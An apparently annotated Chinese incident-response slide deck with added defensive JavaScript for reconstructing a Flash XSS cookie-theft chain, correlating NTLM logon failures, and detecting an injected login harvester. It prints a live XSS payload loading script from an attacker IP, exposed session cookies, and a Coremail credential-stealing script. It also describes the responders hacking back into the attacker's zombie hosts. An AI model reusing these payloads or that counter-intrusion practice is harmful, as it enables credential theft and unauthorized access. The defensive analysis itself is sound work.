9.“企业应急响应与反渗透”之真实案例分析 (Enterprise Incident Response and Counter-Penetration: Real Case Analysis)

17.
==================================================
URL : http://t.cn/zWI1bUQ
Last Visit Date : 2012-7-16 19:22:27
==================================================
==================================================
URL : http://50.116.13.242/index.php
Last Visit Date : 2012-7-16 19:22:28
Referrer : http://t.cn/zWI1bUQ
==================================================
==================================================
URL : http://**.***.com/_common/jwplayer/player.swf?debug=(function(){location.href=%27javascript:%22%3Cscript/src=http://50.116.13.242/e.js%3E%3C/script%3E%22%27})
Last Visit Date : 2012-7-16 19:22:28
Referrer : http://50.116.13.242/index.php
Title : player.swf (application/x-shockwave-flash object)
==================================================
==================================================
URL : http://50.116.13.242/e.php?opener=0&cookie=ULV%3D1342421444188%3A342%3A12%3A1%3A306588567000.3021.1342421444076%3A1342141514702%3B%20__utma%3D182865017.844076418.1336462885.1341536058.1341543017.15%3B%20__utmz%3D182865017.1341473198.13.8.utmcsr%3Dweibo.com%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D/breakingnews%3B%20vjuids%3Ddae3c1e13.1369ca9b037.0.1a9eb5f46e6ac8%3B%20vjlast%3D1334068228.1341096989.11%3B%20UOR%3D%2C%2C%3B%20un%3Dxlttnews@sina.com%3B%20wvr%3D3.6%3B%20_s_tentry%3Dnews.sina.com.cn%3B%20Apache%3D306588567000.3021.1342421444076%3B%20SINAGLOBAL%3D306588567000.3021.1342421444076%3B%20SUS%3DSID-1618051664-1342421545-XD-z8hcn-efefbc9f4464bf215caf1d6b0da488bf%3B%20SUE%3Des%253D5937b4f4509871fc45195767ea7abe37%2526ev%253Dv1%2526es2%253Da42f0190f7b1f5137f761f625bbe0e81%2526rs0%253DpnLlydVz7IsdBcHbRCS8Tdb1KmHl7c%25252F758lHMKQRftFZBm9EDKoFVF7jexRKPF8CpY3rjGOora0pZ%25252FyDJSaDWJxRQn020MpsJxXhf5NdP2h3jfo2V%25252FoQgA0olYEWGJNQIDFZDfkndhSSXCp%25252BldHRW%25252BkEMwhvhY4p3xR0Ki5ja94%25253D%2
Last Visit Date : 2012-7-16 19:22:31
Referrer : http://**.***.com/_common/jwplayer/player.swf?debug=(function(){location.href=%27javascript:%22%3Cscript/src=http://50.116.13.242/e.js%3E%3C/script%3E%22%27})
==================================================
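The four history records above are one complete attack chain: a Weibo short link (t.cn) leads to the attacker's landing page on 50.116.13.242, which embeds the victim site's own player.swf with a `debug` parameter whose value is a JavaScript function body; that body runs in the embedding page (the JW Player `debug` XSS), sets location.href to a javascript: URL that loads e.js from the attacker's host, and e.js then sends document.cookie, including the `un` (user name) cookie and the site's session cookies, to e.php as the `cookie` query parameter. The following is an added example, not code from the deck or from the incident: it reconstructs that chain from history records in the same format. The records are constructed from the slide's entries; the attacker IP, the payload and the cookie names are kept, the cookie values and the victim account are replaced by placeholders.

```javascript
// Added example (not from the deck): reconstruct the Flash XSS -> cookie
// theft chain from browser-history records shaped like the ones above.
// Records are constructed from the slide's entries; attacker IP, payload and
// cookie names are kept, cookie values and the victim account are placeholders.
const SWF_URL =
  "http://**.***.com/_common/jwplayer/player.swf?debug=(function(){location.href=" +
  "%27javascript:%22%3Cscript/src=http://50.116.13.242/e.js%3E%3C/script%3E%22%27})";

const HISTORY = [
  { url: "http://t.cn/zWI1bUQ", referrer: null },
  { url: "http://50.116.13.242/index.php", referrer: "http://t.cn/zWI1bUQ" },
  { url: SWF_URL, referrer: "http://50.116.13.242/index.php" },
  {
    url: "http://50.116.13.242/e.php?opener=0&cookie=ULV%3D1342421444188%3B%20un%3D" +
         "victim@example.com%3B%20SUS%3DSID-PLACEHOLDER%3B%20SUE%3Des%253DPLACEHOLDER",
    referrer: SWF_URL,
  },
];

// Split the query string on '&' and on the FIRST '=' of each pair only:
// the debug payload itself contains '=' characters.
function queryParams(url) {
  const q = url.indexOf("?");
  const params = new Map();
  if (q < 0) return params;
  for (const pair of url.slice(q + 1).split("&")) {
    const eq = pair.indexOf("=");
    if (eq < 0) params.set(pair, "");
    else params.set(pair.slice(0, eq), pair.slice(eq + 1));
  }
  return params;
}

// Percent-decode the debug parameter and pull out the remote script it loads.
function decodeDebugPayload(url) {
  const debug = queryParams(url).get("debug");
  if (debug === undefined) return null;
  const payload = decodeURIComponent(debug);
  const m = /<script\/?\s*src=([^>\s"']+)/i.exec(payload);
  return { payload, injectedScript: m ? m[1] : null };
}

// The collector receives document.cookie, URL-encoded, as the `cookie` param.
// Decode it once and split into name/value pairs; doubly-encoded values such
// as SUE stay encoded, exactly as the victim's browser sent them.
function stolenCookies(url) {
  const raw = queryParams(url).get("cookie");
  const jar = new Map();
  if (raw === undefined) return jar;
  for (const part of decodeURIComponent(raw).split(/;\s*/)) {
    const eq = part.indexOf("=");
    if (eq > 0) jar.set(part.slice(0, eq), part.slice(eq + 1));
  }
  return jar;
}

function hostOf(url) {
  const m = /^https?:\/\/([^\/?#]+)/.exec(url);
  return m ? m[1] : null;
}

// Walk the history: the vulnerable SWF is the record carrying a debug payload,
// the exfiltration request is the record whose referrer is that SWF URL.
function reconstructChain(history) {
  const swf = history.find((r) => /player\.swf\?/.test(r.url) && queryParams(r.url).has("debug"));
  if (!swf) return null;
  const { payload, injectedScript } = decodeDebugPayload(swf.url);
  const exfil = history.find((r) => r.referrer === swf.url && queryParams(r.url).has("cookie"));
  const jar = exfil ? stolenCookies(exfil.url) : new Map();
  return {
    landingPage: swf.referrer,
    vulnerableSwf: swf.url.slice(0, swf.url.indexOf("?")),
    payload,
    injectedScript,
    exfilHost: exfil ? hostOf(exfil.url) : null,
    cookieNames: [...jar.keys()],
    victimAccount: jar.get("un") || null, // `un` held the victim's account name in the slide's record
  };
}

console.log(JSON.stringify(reconstructChain(HISTORY), null, 2));
```

Run with `node`. The decoded payload is what the responder needs for the report: it names the remote script (e.js) and the collector host without having to fetch anything from the attacker's server, and the cookie names tell you which sessions to invalidate.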
21. About the attacker
• Located a security staffer at a certain company through the IP / e-mail information
• No malicious intent
• Later submitted the vulnerability to WooYun (乌云)
29. Sounding the counterattack
• Collected the attacker's IPs
• Mostly zombie-host ("肉鸡") IPs, in Hong Kong and Langfang
• Used "hacker" methods to gain control of several of the zombie hosts in Hong Kong and Langfang
• Found large numbers of hacking tools and scan logs on the zombies
• Found, from the zombies, that servers on the internal network were still under the attacker's control
38. 2011-11-10,14:03:47,Security,Audit Success,Logon/Logoff,540,**,PDC,"Successful Network Logon:
    User Name: *.ad
    Domain: *
    Logon ID: (0x0,0x1114E11)
    Logon Type: 3
    Logon Process: NtLmSsp
    Authentication Package: NTLM
    Workstation Name: CC-TEST-V2
    Logon GUID: -
    Caller User Name: -
    Caller Domain: -
    Caller Logon ID: -
    Caller Process ID: -
    Transited Services: -
    Source Network Address: 192.168.100.81
    Source Port: 0
"
2011-11-10,3:13:38,Security,Audit Failure,Account Logon,680,NT AUTHORITY\SYSTEM,PDC,"Logon attempt by: MICROSOFT_AUTHENTICATION_PACKAGE_V1_
    Logon account: QM-*$
    Source Workstation: CC-TEST-V2
    Error Code: 0xC000006A
"
2011-11-10,3:13:38,Security,Audit Failure,Account Logon,680,NT AUTHORITY\SYSTEM,PDC,"Logon attempt by: MICROSOFT_AUTHENTICATION_PACKAGE_V1_
    Logon account: QM-*$
    Source Workstation: CC-TEST-V2
    Error Code: 0xC000006A
"
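Read together, the slide-38 records show event 680 (NTLM credential validation on the domain controller) failing with 0xC000006A, which is STATUS_WRONG_PASSWORD for an existing account, from workstation CC-TEST-V2 at 03:13, and event 540 (successful network logon, Logon Type 3, NtLmSsp/NTLM) from the same workstation name and 192.168.100.81 at 14:03 the same day. The check a responder runs over such an export is: password failures from a workstation, followed by a successful network logon from that workstation. The following is an added example, not from the deck: it parses records in the CSV-export shape shown on the slide (English field names; records constructed from the slide's entries with its redactions kept, plus one extra failure and one benign logon from another host for contrast) and correlates them. Event IDs 540/680 are the Windows 2000/2003 ones; on Vista and later the equivalents are 4624 and 4776.

```javascript
// Added example (not from the deck): parse a Windows 2003-style security-log
// CSV export and correlate NTLM password failures with a later successful
// network logon from the same workstation. SAMPLE_LOG is constructed from the
// slide-38 records (English field names, redactions kept), plus one extra
// failure and one benign logon for contrast.
const SAMPLE_LOG = `2011-11-10,3:13:38,Security,Audit Failure,Account Logon,680,NT AUTHORITY\\SYSTEM,PDC,"Logon attempt by: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
Logon account: QM-*$
Source Workstation: CC-TEST-V2
Error Code: 0xC000006A
"
2011-11-10,3:13:38,Security,Audit Failure,Account Logon,680,NT AUTHORITY\\SYSTEM,PDC,"Logon attempt by: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
Logon account: QM-*$
Source Workstation: CC-TEST-V2
Error Code: 0xC000006A
"
2011-11-10,3:13:41,Security,Audit Failure,Account Logon,680,NT AUTHORITY\\SYSTEM,PDC,"Logon attempt by: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
Logon account: QM-*$
Source Workstation: CC-TEST-V2
Error Code: 0xC000006A
"
2011-11-10,14:03:47,Security,Audit Success,Logon/Logoff,540,**,PDC,"Successful Network Logon:
User Name: *.ad
Domain: *
Logon ID: (0x0,0x1114E11)
Logon Type: 3
Logon Process: NtLmSsp
Authentication Package: NTLM
Workstation Name: CC-TEST-V2
Source Network Address: 192.168.100.81
Source Port: 0
"
2011-11-10,14:05:02,Security,Audit Success,Logon/Logoff,540,**,PDC,"Successful Network Logon:
User Name: backup.svc
Domain: *
Logon Type: 3
Logon Process: NtLmSsp
Authentication Package: NTLM
Workstation Name: FILESRV01
Source Network Address: 192.168.100.20
Source Port: 0
"
`;

// A record is a header line (date,time,log,result,category,id,user,computer,
// "first description line) followed by description lines up to the closing quote.
const RECORD_START =
  /^(\d{4}-\d{1,2}-\d{1,2}),(\d{1,2}:\d{2}:\d{2}),([^,]+),([^,]+),([^,]+),(\d+),([^,]*),([^,]+),"(.*)$/;

function parseExport(text) {
  const records = [];
  let cur = null;
  for (const line of text.split(/\r?\n/)) {
    const m = RECORD_START.exec(line);
    let descLine = line;
    if (m) {
      cur = {
        date: m[1], time: m[2], result: m[4], category: m[5],
        eventId: Number(m[6]), user: m[7], computer: m[8],
        timestamp: Date.parse(`${m[1]}T${m[2].padStart(8, "0")}Z`),
        fields: {},
      };
      records.push(cur);
      descLine = m[9];
    }
    if (!cur) continue;
    // "Key: value" lines of the description; the lone closing quote has no colon and is skipped
    const kv = /^\s*([^:]+):\s*(.*?)\s*$/.exec(descLine);
    if (kv) cur.fields[kv[1].trim()] = kv[2];
  }
  return records;
}

const STATUS_WRONG_PASSWORD = "0xC000006A";

// Event 680 Audit Failure with 0xC000006A = wrong password for an existing
// account; event 540 with Logon Type 3 = successful network logon. Several
// failures from a workstation name and then a success from it is the pattern.
function guessingFollowedByLogon(records, minFailures = 2) {
  const failures = new Map(); // workstation -> failed 680 records
  for (const r of records) {
    if (r.eventId === 680 && r.fields["Error Code"] === STATUS_WRONG_PASSWORD) {
      const ws = r.fields["Source Workstation"];
      if (!failures.has(ws)) failures.set(ws, []);
      failures.get(ws).push(r);
    }
  }
  const alerts = [];
  for (const r of records) {
    if (r.eventId !== 540 || r.fields["Logon Type"] !== "3") continue;
    const ws = r.fields["Workstation Name"];
    const prior = (failures.get(ws) || []).filter((f) => f.timestamp <= r.timestamp);
    if (prior.length < minFailures) continue;
    alerts.push({
      workstation: ws,
      sourceAddress: r.fields["Source Network Address"],
      logonAccount: `${r.fields["Domain"]}\\${r.fields["User Name"]}`,
      authPackage: r.fields["Authentication Package"],
      failedAttempts: prior.length,
      guessedAccounts: [...new Set(prior.map((f) => f.fields["Logon account"]))],
      firstFailure: `${prior[0].date} ${prior[0].time}`,
      logonAt: `${r.date} ${r.time}`,
    });
  }
  return alerts;
}

console.log(JSON.stringify(guessingFollowedByLogon(parseExport(SAMPLE_LOG)), null, 2));
```

The correlation key is the workstation name the client supplies in the NTLM exchange, which an attacker can set freely, so a match means "same claimed host", not "same machine"; the Source Network Address on the 540 record is what you pivot to for the network side, as the slide does with 192.168.100.81.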
45. About the attacker
• The US VPS held multiple QQ accounts and passwords
• Their account on a domestic (Chinese) forum had been obtained earlier
51. // Injected into the Coremail login page's form handler: read the user name
// and password, ship them to the attacker's collector, then hand off to the
// page's legitimate submit routine so the login still works and nothing looks
// wrong to the victim. f, fOnSubmit, getdomain, GetXmlHttpObject and
// stateChanged are the login page's own objects and functions.
function ffCheck() {
  try {
    try {
      // user name: from the form object when present, otherwise from the DOM
      var u = null != f ? f.idInput.value : document.getElementById("idInput").value;
    } catch (e) {
      // fallback for page variants that render the account as text; strip whitespace
      var u = (document.getElementById("idInput").innerHTML).replace(/\s/g, "");
    }
    var p = null != f ? f.pwdInput.value : document.getElementById("pwdInput").value;
    // turn a bare account name into a full address ("xxx.com" is redacted on the slide)
    if (u.indexOf("@") == -1) u += "@xxx.com";
    try {
      // unreachable after the append above; left as found
      if (u.indexOf("@") == -1) u = u + getdomain();
    } catch (e) {}
    // exfiltrate before the real login proceeds
    sendurl("/abc", u, p, "coremail");
  } catch (e) {}
  // always fall through to the legitimate handler
  return fOnSubmit();
}
52. // Collector: POST the captured credentials as a form body to the given path,
// with a timestamp in the query string so no cache serves the request.
function sendurl(uri, u, p, i) {
  xmlHttp = GetXmlHttpObject();
  if (xmlHttp == null) {
    return;
  }
  param = "user=" + u + "&pass=" + p + "&icp=" + i;
  xmlHttp.onreadystatechange = stateChanged;
  try {
    xmlHttp.open("POST", uri + "?t=" + (new Date()).valueOf(), true);
  } catch (e) {}
  xmlHttp.setRequestHeader("If-Modified-Since", "0");
  xmlHttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
  xmlHttp.send(param);
}
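Whatever the harvester looks like, it has to do two things the legitimate handler does not: read the password field and move the value off the page. That is what a responder checks for once a served login script no longer matches its known-good copy. The following is an added example, not from the deck or from Coremail: it lists the lines the served script adds relative to the known-good one and tests each for those indicators. KNOWN_GOOD is a constructed stand-in for the real handler (only the fall-through to fOnSubmit is assumed); SERVED is that stand-in with the slide-51/52 harvester spliced in. The set-based line diff is a triage heuristic, not a real diff.

```javascript
// Added example (not from the deck): given the login page's known-good script
// and the script actually served, isolate the added lines and test them for
// the two things a credential harvester cannot avoid: reading the password
// field and making a network request. KNOWN_GOOD is a constructed stand-in
// for the real Coremail handler; SERVED is KNOWN_GOOD plus the slide's code.
const KNOWN_GOOD = `
function ffCheck() {
  return fOnSubmit();
}
`;

const SERVED = `
function ffCheck() {
  try {
    try {
      var u = null != f ? f.idInput.value : document.getElementById("idInput").value;
    } catch (e) {
      var u = (document.getElementById("idInput").innerHTML).replace(/\\s/g, "");
    }
    var p = null != f ? f.pwdInput.value : document.getElementById("pwdInput").value;
    if (u.indexOf("@") == -1) u += "@xxx.com";
    sendurl("/abc", u, p, "coremail");
  } catch (e) {}
  return fOnSubmit();
}
function sendurl(uri, u, p, i) {
  xmlHttp = GetXmlHttpObject();
  if (xmlHttp == null) { return; }
  param = "user=" + u + "&pass=" + p + "&icp=" + i;
  xmlHttp.onreadystatechange = stateChanged;
  xmlHttp.open("POST", uri + "?t=" + (new Date()).valueOf(), true);
  xmlHttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
  xmlHttp.send(param);
}
`;

// Indicators, each applied to a single normalised line.
const READS_CREDENTIAL = /(pwd|pass|passwd)\w*\b.*(\.value|innerHTML)|getElementById\(["'][^"']*(pwd|pass)/i;
const BUILDS_BODY = /["'](user|pass|login|pwd)\w*=/i;
const SENDS_REQUEST = /\.send\(|\.open\(|XMLHttpRequest|ActiveXObject\(|fetch\(|sendBeacon\(|\.src\s*=/;

function normalize(line) {
  return line.replace(/\s+/g, " ").trim();
}

// Set-based line diff: enough to isolate an injected block, not a real diff
// (moved or re-indented legitimate lines would also show up as "added").
function addedLines(knownGood, served) {
  const good = new Set(knownGood.split("\n").map(normalize).filter(Boolean));
  return served.split("\n").map(normalize).filter((l) => l && !good.has(l));
}

function findInjectedHarvester(knownGood, served) {
  const added = addedLines(knownGood, served);
  const readsCredential = added.filter((l) => READS_CREDENTIAL.test(l));
  const buildsBody = added.filter((l) => BUILDS_BODY.test(l));
  const sendsRequest = added.filter((l) => SENDS_REQUEST.test(l));
  return {
    addedLineCount: added.length,
    readsCredential,
    buildsBody,
    sendsRequest,
    // A harvester must both read the secret and move it off the page.
    suspicious: readsCredential.length > 0 && sendsRequest.length > 0,
  };
}

console.log(JSON.stringify(findInjectedHarvester(KNOWN_GOOD, SERVED), null, 2));
```

The cheaper routine control is to hash every served login asset against the deployed build and alert on any mismatch; this diff is for the minute after that alert fires, when you need to know whether the change is a harmless edit or something that reads `pwdInput` and calls `send`.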